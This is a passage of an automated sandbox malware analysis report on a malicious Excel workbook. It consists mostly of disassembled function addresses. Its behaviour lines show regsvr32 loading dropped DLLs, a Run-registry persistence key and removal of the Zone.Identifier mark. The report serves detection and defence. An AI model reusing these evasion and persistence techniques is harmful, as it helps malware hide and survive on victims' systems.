                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180008688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800058C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009D2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D7F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027448
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C1E0
                      Source: 4470_02112022.xlsMacro extractor: Sheet name: Sheet6
                      Source: 4470_02112022.xlsMacro extractor: Sheet name: Sheet6
                      Source: 4470_02112022.xlsReversingLabs: Detection: 80%
                      Source: 4470_02112022.xlsVirustotal: Detection: 67%
                      Source: 4470_02112022.xlsMetadefender: Detection: 31%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HC8X1KC5.txtJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5927.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/10@4/50
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: 4470_02112022.xlsOLE indicator, Workbook stream: true
                      Source: 4470_02112022.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009D2C CloseHandle,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1001B1B0 FindResourceA,LoadResource,LockResource,FreeResource,
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: 4470_02112022.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006870 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180009097 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800230F3 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006957 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006212 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008A56 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180005A82 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006415 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800224FA push ebp; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008D61 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000658C push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008E30 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006633 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006738 push 45C7D274h; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008F44 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006212 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006870 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006738 push 45C7D274h; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: oxnv4.ooccxx.0.drStatic PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: 40hd04O0[1].dll.0.drStatic PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file

                      Boot Survival

                      barindex
                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FatGkw.dllJump to behavior
                      Drops PE files to the user root directory
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FatGkw.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FatGkw.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10020690 IsWindowVisible,IsIconic,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10010AE4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe TID: 2212Thread sleep time: -60000s >= -30000s
